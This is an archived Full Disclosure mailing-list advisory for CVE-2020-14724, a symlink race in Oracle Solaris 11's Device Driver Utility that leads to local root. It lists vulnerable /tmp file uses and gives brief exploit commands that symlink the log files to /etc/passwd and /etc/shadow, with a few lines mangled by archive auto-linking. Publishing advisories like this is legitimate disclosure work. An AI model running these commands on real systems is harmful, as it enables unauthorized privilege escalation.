[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Insecure /tmp file use in Oracle Solaris 11 Device Driver Utility v1.3.1 leads to root
From: "Larry W. Cashdollar via Fulldisclosure" <fulldisclosure () seclists ! org>
Date: 2020-07-15 4:02:52
Message-ID: 1A0AAEA8-B74F-4CB2-BDFB-22EBF975D7BD () me ! com
[Download RAW message or body]
Title: Insecure /tmp file use in Oracle Solaris 11 Device Driver Utility v1.3.1 leads to root
Author: Larry W. Cashdollar, @_larry0
Date: 2020-02-02
CVE-2020-14724
Download Site: https://docs.oracle.com/cd/E37838_01/html/E69250/useddu.html
Vendor: Oracle, fixed in July 14 2020 CPU \
https://www.oracle.com/security-alerts/cpujul2020.html.
Vendor Notified: 2020-02-02
Vendor Contact: secalert_us@oracle.com
Advisory: http://www.vapidlabs.com/advisory.php?v=212
Description: "The Device Driver Utility provides information about the devices on your \
installed system and the drivers that manage those devices. The DDU reports whether the \
currently booted operating system has drivers for all of the devices that are detected in your \
system. If a device does not have a driver attached, the Device Driver Utility recommends a \
driver package to install."
Vulnerability:
Append contents of ddu_log to system files via symlink attack:
In ./ddu-text/utils/ddu-text.py
18 LOG_LOCATION = "/tmp/ddu_log" .
45: print _("Exiting Text Installer. Log is available at:\n%s") % LOG_LOCATION
50: logging.basicConfig(filename=LOG_LOCATION, level=LOG_LEVEL,
Elevation of priviledges via symlink attack due to chmod operation on /tmp file:
In file ./ddu-text/utils/inner_window.py
667: logfile = open('/tmp/ddu_err.log', 'a')
695: logfile = open('/tmp/ddu_err.log', 'a')
721: logfile = open('/tmp/ddu_err.log', 'a')
748: logfile = open('/tmp/ddu_err.log', 'a')
In file ./scripts/comp_lookup.sh
33:typeset err_log=/tmp/ddu_err.log In file ./scripts/det_info.sh
38:typeset err_log=/tmp/ddu_err.log In file ./scripts/pkg_relate.sh
449:typeset err_log=/tmp/ddu_err.log In file ./scripts/find_media.sh
20:typeset err_log=/tmp/ddu_err.log
There is a race condition here between file creation and chmod 666 where a local user can run a \
simple script to ensure the symlink exists after the ddu_err.log file is removed:
In file ./scripts/probe.sh 569:
# Make /tmp/ddu_err.log writable for every user
571: if [ -f /tmp/ddu_err.log ]; then
572: pfexec chmod 666 /tmp/ddu_err.log
574: touch /tmp/ddu_err.log; chmod 666 /tmp/ddu_err.log
636:typeset err_log=/tmp/ddu_err.log
These are also potential file clobbering issues: From probe.sh
131: NIC_info_file=/tmp/dvt_network_info_file
133: temp_file=/tmp/dvt_network_temp
134: temp_file_2=/tmp/dvt_network_temp_2
207: c_file=/tmp/str_ctrl_file
208: c_file1=/tmp/str_ctrl_file_1
209: c_file2=/tmp/str_ctrl_file_2
210: c_file3=/tmp/str_ctrl_file_3
211: c_file4=/tmp/str_ctrl_file_4
212: c_file5=/tmp/str_ctrl_file_5
328: dvt_cd_dev_tmpfile=/tmp/dvt_cd_dev_tmpfile
329: dvt_cd_ctl_tmpfile=/tmp/dvt_cd_ctl_tmpfile
330: dvt_cd_ctl_tmpfile1=/tmp/dvt_cd_ctl_tmpfile1
398: temp_file1=/tmp/dvt_tmp_file1
399: temp_file2=/tmp/dvt_tmp_file2
462: cpu_tmpfile=/tmp/cpu_tmpfile
490: memory_tmpfile=/tmp/memory_tmpfile
624:typeset ctl_file=/tmp/dvt_ctl_file
Exploit Code:
1. Tested on Solaris 11 x86
2. larry@SolSun:~$ uname -a
3. SunOS SolSun 5.11 11.4.0.15.0 i86pc i386 i86pc
4. and
5. Open Indiana
6. root@openindiana:/export/home/larry# uname -a
7. SunOS openindiana 5.11 illumos-1b500975aa i86pc i386 i86pc
9. Append content to /etc/passwd
10. larry@openindiana:/tmp$ ln -s /etc/passwd ddu_log
12. To get local root simply have ddu http://www.php.net/chmod 666 /etc/shadow
13. larry@openindiana:/tmp$ while true; do ln -s /etc/shadow ddu_err.http://www.php.net/log; \
done
14.
15. A better exploit:
https://github.com/lcashdol/Exploits/tree/master/ddu-exploit
Patches to OpenIndiana
https://github.com/OpenIndiana/ddu/commit/31dca7f6bee738980ecabefadedd01fcc3f3acf6
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic